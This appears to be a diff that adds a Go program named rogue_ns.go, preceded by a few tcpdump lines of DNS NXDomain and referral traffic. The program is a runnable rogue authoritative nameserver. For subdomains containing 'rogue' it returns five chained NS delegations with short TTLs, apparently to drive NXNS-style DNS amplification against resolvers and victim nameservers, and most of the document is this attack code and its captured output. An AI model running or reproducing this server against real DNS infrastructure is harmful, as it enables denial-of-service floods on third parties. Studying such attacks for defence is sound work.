+17:38:22.672744 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.39836: 35373 NXDomain*- 0/0/0 (38)
+17:38:22.673411 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.49086: 15933 NXDomain*- 0/0/0 (38)
+17:38:22.673563 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.43022: 60592*- 0/5/0 (158)
+17:38:22.673665 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.53923: 31379 NXDomain*- 0/0/0 (38)
+17:38:22.674169 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.39731: 28626*- 0/5/0 (158)
+17:38:22.675082 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.59696: 6103 NXDomain*- 0/0/0 (38)
+17:38:22.675385 IP 159.75.200.247.domain > iZ2ze11fv3gfx9tcsh4cdzZ.60752: 3623 NXDomain*- 0/0/0 (38)
--- a/BIN
+++ b/BIN
--- a/rogue_ns.go
+++ b/rogue_ns.go
@@ -0,0 +1,64 @@
+package main
+
+import (
+	"flag"
+	"net"
+	"strconv"
+	"strings"
+
+	"github.com/miekg/dns"
+)
+
+func rogue_delegation(w dns.ResponseWriter, r *dns.Msg) {
+	m := new(dns.Msg)
+	m.SetReply(r)
+	m.Compress = true
+	m.Authoritative = true
+
+	qname := m.Question[0].Name
+	qtype := m.Question[0].Qtype
+	subdomain := strings.ToLower(strings.Split(qname, ".")[0])
+	if qtype == dns.TypeA {
+		if subdomain == "ns1" || subdomain == "ns2" {
+			resp := &dns.A{
+				Hdr: dns.RR_Header{Name: qname, Rrtype: dns.TypeA, Class: dns.ClassINET, Ttl: 10},
+				A:   net.ParseIP(CONFIG_NS),
+			}
+			m.Answer = append(m.Answer, resp)
+		} else if strings.Contains(subdomain, "rogue") {
+			var ns_target string
+			var resp *dns.NS
+			for i := 0; i < 5; i++ {
+				ns_target = strings.Join([]string{subdomain + strconv.Itoa(i), CONFIG_SLD}, ".")
+				resp = &dns.NS{
+					Hdr: dns.RR_Header{Name: qname, Rrtype: dns.TypeNS, Class: dns.ClassINET, Ttl: 10},
+					Ns:  dns.Fqdn(ns_target),
+				}
+				m.Ns = append(m.Ns, resp)
+			}
+		} else {
+			m.MsgHdr.Rcode = dns.RcodeNameError
+		}
+	} else {
+		m.MsgHdr.Rcode = dns.RcodeNameError
+	}
+	w.WriteMsg(m)
+}
+
+var CONFIG_SLD string
+var CONFIG_NS string
+
+func main() {
+	flag.StringVar(&CONFIG_NS, "ns", "8.8.8.8", "nameserver ip address")
+	flag.StringVar(&CONFIG_SLD, "sld", "", "configure sld for rogue server")
+	flag.Parse()
+	if CONFIG_SLD == "" {
+		panic("Please configure the SLD for the echo dns server!\n")
+	}
+	dns.HandleFunc(dns.Fqdn(CONFIG_SLD), rogue_delegation)
+	server := &dns.Server{Addr: ":53", Net: "udp"}
+	if err := server.ListenAndServe(); err != nil {
+		println("Failed to set up the rogue server")
+		panic(err)
+	}
+}